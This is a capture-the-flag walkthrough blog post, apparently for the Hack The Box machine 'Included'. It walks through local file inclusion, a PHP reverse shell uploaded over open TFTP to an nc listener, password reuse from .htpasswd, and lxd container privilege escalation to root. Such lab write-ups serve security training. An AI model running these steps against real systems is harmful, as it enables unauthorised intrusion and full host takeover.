top of page

Included (VIP only)


As usual, let's start with nmap:

nmap -sV -sC

Let's also do an udp scan too using:

sudo nmap -sU

Enter your password

udp scans takes a lot longer than the usual tcp scans, be patient. Also, udp scans require to use sudo

Note that port 69 udp is open, which is associated with tftp.

Port 80 is open, so let's check the website by going to :

Even though I typed, I got redirected to

This looks like file inclusion, explaining the name of the machine "included"

Let's try it. Let's see if we can access the file /etc/passwd using


Using curl, we can have a nicer display of users


What is the /etc/passwd file?

  • The /etc/passwd file keeps track of all the registered users on the system. It is a colon-separated file ( : )

  • It contains, in this order, user name, encrypted password, UID, GID, user home directory, login shell

  • The file /etc/passwd is owned by the root user but must be readable by all users. Only root can write this file.

  • Then encrypted passwords are stored in /etc/security/passwd file

Earlier, we found from the udp scan that udp port 69/udp is open, which is associated with tftp

Let's install tftp first using:

sudo apt install tftp

Once installed, type:

By default TFTP works without the need for authentication, meaning that anyone can upload and download files from the remote system!


Open a new command prompt window and type:

locate webshells

cd /usr/share/webshells/php


We are interested in php-reverse-shell.php. Let's make a copy first, called shell.php

sudo cp php-reverse-shell.php shell.php

Let's now move shell.php to our home directory

sudo mv shell.php /home/htb-sneakymouse/
Your home directory will be different

Now open a new command prompt window and type:


We can see shell.php is now here in our home directory

Now let's edit this shell.php file using:

sudo nano shell.php

Scroll down until you see:

We need to change the $ip to the IP of our VM

if you don't know the IP of your VM, open a new command prompt window and type ifconfig

We need to change the $port to 4444 (this is because we will set up our netcat listener on port 4444)

When done, use:

Ctrl X

Press Y

Press enter

Now that we have shell.php ready, we need to upload it to the target using tftp. Go back to your tftp session and type:

put shell.php
Make sure you are in your home directory for the command above, as we will now upload shell.php

Now that we have uploaded our file we can just quit:


Now let's open a new command prompt window and set up our netcat listener on port 4444

nc -lnvp 4444

Now go the url

Nothing happens but this is triggering the shell.php file on the target machine. Now go back to your netcat and you should have a connection:

We got the shell! Let's upgrade the shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'


cd home

cd mike
cat user.txt

We are www-data and we are not allowed to read user.txt in mike directory

Lateral movement

Let's look for some credentials in:

cd var/www/html

ls -al

.htpasswd is where we store the password for the website

cat .htpasswd

We got the password! Maybe mike is using the same password to access the system


su mike

When prompted for the password, type:


We got in and we are now Mike


cd /home
cd mike
cat user.txt

Congratulations! You got the user flag!


Privilege escalation

sudo -l

mike was not granted sudo right on the machine


Let's google lxd and lxd privilege escalation. We find that we can escalate our privileges using lxd. With lxd, we can run system containers. system containers are like a full OS, almost like a VM.

From you VM, open a new command prompt window and follow the steps below:

sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools

--> this installs the Go programming languages along with some other required packages

git clone

--> this downloads a copy of distrobuilder. We need distrobuilder to create container images for lxd

cd distrobuilder


--> distrobuilder has been built successfully!

Create a new directory called ContainerImages and a directory inside it called alpine using:

mkdir ContainerImages
cd ContainerImages
mkdir alpine
cd alpine

Let's also download the alpine.yaml file using:



Let's now build it:

sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

when done you should have something like this


we now have lxd.tar.xz and rootfs.squashfs

Let's create a web service on port 8000 on our VM using:

python3 -m http.server 8000

Now let's switch back to the shell on the target.


cd /tmp


--> this go retrieve the rootfs.squashfs from the webserver we just created on our VM and download the file to the target machine


--> this go retrieve the lxd.tar.xz from the webserver we just created on our VM and download the file to the target machine


Now the files are on the target machine!

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

--> this import the image and call it with the alias alpine

lxc image list

--> we use this command to make sure the image has been imported properly

lxc init alpine privesc -c security.privileged=true

lxc list

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

lxc start privesc

lxc exec privesc /bin/sh

We got a shell! not the prettiest shell but that will do!

cd /mnt/root/root

cat root.txt

Congratulations! You got the root flag!


432 views0 comments

Recent Posts

See All


Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page